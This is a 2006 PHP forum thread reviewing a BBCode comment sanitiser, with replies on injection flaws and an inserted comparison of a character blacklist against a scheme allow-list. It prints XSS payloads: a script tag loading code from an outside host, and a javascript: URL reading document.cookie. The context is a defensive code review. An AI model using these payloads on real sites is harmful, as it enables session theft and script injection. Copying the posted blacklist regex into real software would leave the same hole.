
Form Security Advice?

Posted: Mon Dec 11, 2006 10:52 am
by kaisellgren
Greetings dear members!

I have been reading thousands of articles on PHP security, and I wrote a simple comment script.

Can you find anything 'evilish', or even just annoying bugs?

Code:

<?php

$message = $_POST["message"];

/*
 No HTML is accepted directly. It is only accepted through BBCode.
*/
$message = htmlspecialchars($message);

/*
 Convert carriage return + line feed pairs to a <br /> tag.
*/
$message = preg_replace("/\x0D\x0A/","<br />",$message);

/*
 Replace all BBCode URL tags [url=xxx]yyy[/url] with working HTML anchors
 IF xxx does NOT contain the characters '(', ')' or ';'.

 This makes it possible to use any protocol in anchors that does not carry anything dangerous.
 For example 'mailto:example@host.com' is valid while 'javascript: alert();' is not.

 The reason I like this method is that when you type '[url=javascript:alert("hacked");]click[/url]',
 it will not be stripped or even modified - it will be shown as it is: '[url=javascript:alert("hacked");]click[/url]'.
*/
$message = preg_replace("/\[url=([^\]\(\);]+?)\](.+?)\[\/url\]/i","<a href=\"\\1\">\\2</a>",$message);

echo $message;

?>
I really want it to be totally 'unhackable'. ANY advice is welcome.

Thank you for your time! :)

Posted: Mon Dec 11, 2006 11:17 am
by feyd
Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.

Posted: Mon Dec 11, 2006 11:24 am
by kaisellgren
feyd wrote:Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.
I read something on Wikipedia saying it's better to use \x0D\x0A than \r\n for some reason... I don't remember why. Maybe it does not matter when it comes to web programming?

What kind of injection is the url tag vulnerable to? JavaScript, no... vbscript, no... applets, no; file, no; about, no; wysiwyg, no; data, no; view-source, yes! but who cares?; ms-its, no; mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript... I tried everything I could ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE?

Posted: Mon Dec 11, 2006 7:18 pm
by Ambush Commander
I read something on Wikipedia saying it's better to use \x0D\x0A than \r\n for some reason... I don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
What kind of injection is the url tag vulnerable to? JavaScript, no... vbscript, no... applets, no; file, no; about, no; wysiwyg, no; data, no; view-source, yes! but who cares?; ms-its, no; mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript... I tried everything I could ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't: see this:

Code:

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
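As an added example (not code posted by anyone in this thread), here is the character blacklist from the first post next to a scheme allow-list that follows the advice above to validate the URL properly instead of hunting for dangerous characters. The function names, the allowed schemes (http, https, mailto) and the three sample inputs are my own assumptions, and the javascript: sample is constructed to show a payload that needs no parentheses, quotes or semicolons. Assumes PHP 7 or later.

```php
<?php
// Added example for this thread, not code posted by any participant.
// Compares the character blacklist from the first post with a scheme
// allow-list. Function names, scheme list and sample inputs are assumptions.

// Blacklist approach as posted: anything goes in the href except ']', '(', ')' and ';'.
function bbcode_url_blacklist(string $message): string
{
    $message = htmlspecialchars($message);
    return preg_replace(
        '/\[url=([^\]\(\);]+?)\](.+?)\[\/url\]/i',
        '<a href="$1">$2</a>',
        $message
    );
}

// Allow-list approach: only http, https and mailto become anchors, and the
// value is validated with filter_var() before it is written into the attribute.
function bbcode_url_allowlist(string $message): string
{
    // ENT_QUOTES also escapes single quotes; the default flags before PHP 8.1 do not.
    $message = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');

    return preg_replace_callback(
        '/\[url=([^\]]+?)\](.+?)\[\/url\]/i',
        function (array $m): string {
            // $m[1] was escaped above; decode it so the validator sees the raw URL.
            $url = htmlspecialchars_decode($m[1], ENT_QUOTES);

            if (stripos($url, 'mailto:') === 0) {
                $valid = filter_var(substr($url, 7), FILTER_VALIDATE_EMAIL) !== false;
            } elseif (preg_match('#^https?://#i', $url)) {
                $valid = filter_var($url, FILTER_VALIDATE_URL) !== false;
            } else {
                $valid = false;   // javascript:, data:, vbscript:, ... never become anchors
            }

            if (!$valid) {
                // Leave the tag exactly as typed (already HTML-escaped), which is
                // what the first post wanted for rejected input.
                return $m[0];
            }
            // Re-escape on output so a validated URL cannot close the attribute.
            return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">' . $m[2] . '</a>';
        },
        $message
    );
}

// Constructed inputs.
$samples = [
    // Legitimate link with a query string. After htmlspecialchars() the '&'
    // becomes '&amp;', which contains ';', so the blacklist refuses a valid URL.
    '[url=http://example.com/page?a=1&b=2]query string[/url]',
    '[url=mailto:user@example.com]mail me[/url]',
    // Plain assignment: no '(', ')', ';' or quotes anywhere, so the blacklist
    // passes it straight through as a clickable javascript: anchor.
    '[url=javascript:document.title=document.cookie]click[/url]',
];

foreach ($samples as $s) {
    echo "input:     $s\n";
    echo "blacklist: " . bbcode_url_blacklist($s) . "\n";
    echo "allowlist: " . bbcode_url_allowlist($s) . "\n\n";
}
```

The point of the callback is that the decision is made on the decoded URL by scheme, and the value is escaped again only at the moment it is written into the attribute. The blacklist version both lets the javascript: sample through and breaks the ordinary query-string link, because htmlspecialchars() runs before the regex and turns '&' into '&amp;'.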

Posted: Tue Dec 12, 2006 3:03 am
by kaisellgren
Ambush Commander wrote:
I read something on Wikipedia saying it's better to use \x0D\x0A than \r\n for some reason... I don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
What kind of injection is the url tag vulnerable to? JavaScript, no... vbscript, no... applets, no; file, no; about, no; wysiwyg, no; data, no; view-source, yes! but who cares?; ms-its, no; mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript... I tried everything I could ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't: see this:

Code:

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
Strange, but this sdfsd is output as sdfsd without any HTML anchors. Why? In my regex only ](); are listed, so it should make it an anchor. Perhaps some security thing in PHP? Also, this outputs only text:

Code:

[url=">Hmm<"]sdfsd[/url]
Nothing dangerous in that, just tested. Or did I type something wrong? I guess you tried to break the HTML anchor tag with "> and output Hmm, but it didn't work.

EDIT: I realized. Both your first and second methods don't work because I used htmlspecialchars()!